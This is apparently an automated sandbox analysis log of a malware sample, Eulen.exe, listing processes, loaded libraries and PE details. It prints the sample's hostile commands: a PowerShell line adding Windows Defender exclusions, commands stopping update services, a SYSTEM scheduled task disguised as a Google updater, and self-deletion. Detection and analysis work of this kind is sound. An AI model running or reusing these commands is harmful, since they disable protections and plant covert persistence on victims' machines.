Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Eulen.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Eulen.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe "C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Eulen.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Eulen.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe "C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process created: unknown unknown

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\choice.exe	Section loaded: version.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe

Directory created: C:\Program Files\Google\Libs

Source: Eulen.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Eulen.exe

Static file information: File size 44977152 > 1048576

Source: Eulen.exe

Static PE information: Raw size of .D6u is bigger than: 0x100000 < 0x2ae3800

Source: Eulen.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Diagnostics.pdb source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbx source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ~1.PDB @7_9)ux source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error3)y source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb04 source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorV)y source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\symsrv.dllp.pdb source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Desktop\Eulen.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }			Jump to behavior

Source: initial sample

Static PE information: section where entry point is pointing to: .D6u

Source: Eulen.exe	Static PE information: section name: .xdata
Source: Eulen.exe	Static PE information: section name: .@yC
Source: Eulen.exe	Static PE information: section name: .j]_
Source: Eulen.exe	Static PE information: section name: .+.:
Source: Eulen.exe	Static PE information: section name: .D6u
Source: ChromeUpdater.exe.0.dr	Static PE information: section name: .xdata
Source: ChromeUpdater.exe.0.dr	Static PE information: section name: .@yC
Source: ChromeUpdater.exe.0.dr	Static PE information: section name: .j]_
Source: ChromeUpdater.exe.0.dr	Static PE information: section name: .+.:
Source: ChromeUpdater.exe.0.dr	Static PE information: section name: .D6u
Source: auqpbnqlvfdv.tmp.39.dr	Static PE information: section name: _RANDOMX
Source: auqpbnqlvfdv.tmp.39.dr	Static PE information: section name: _TEXT_CN
Source: auqpbnqlvfdv.tmp.39.dr	Static PE information: section name: _TEXT_CN
Source: auqpbnqlvfdv.tmp.39.dr	Static PE information: section name: _RDATA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4AF1D2A5 pushad ; iretd	15_2_00007FFB4AF1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4AF1DA86 push edi; ret	15_2_00007FFB4AF1DA87
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4B037BD3 push eax; ret	15_2_00007FFB4B037BA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4B033AD3 pushad ; ret	15_2_00007FFB4B033AD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4B037B9A push eax; ret	15_2_00007FFB4B037BA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4B0311BD pushad ; ret	15_2_00007FFB4B031202
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4B03B8FB pushad ; iretd	15_2_00007FFB4B03B969
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4B037127 push esp; retf	15_2_00007FFB4B037128
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4B03754D push ebx; iretd	15_2_00007FFB4B03756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4B103730 push eax; ret	15_2_00007FFB4B103731
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E9917322B8 push rdx; retf	19_2_000002E9917322B9
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E9917384FD push rcx; retf 003Fh	19_2_000002E9917384FE
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763130 push rbp; retf	19_2_000002E991763133
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763138 push rsi; retf	19_2_000002E991763143
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763100 push rbp; retf	19_2_000002E99176310B
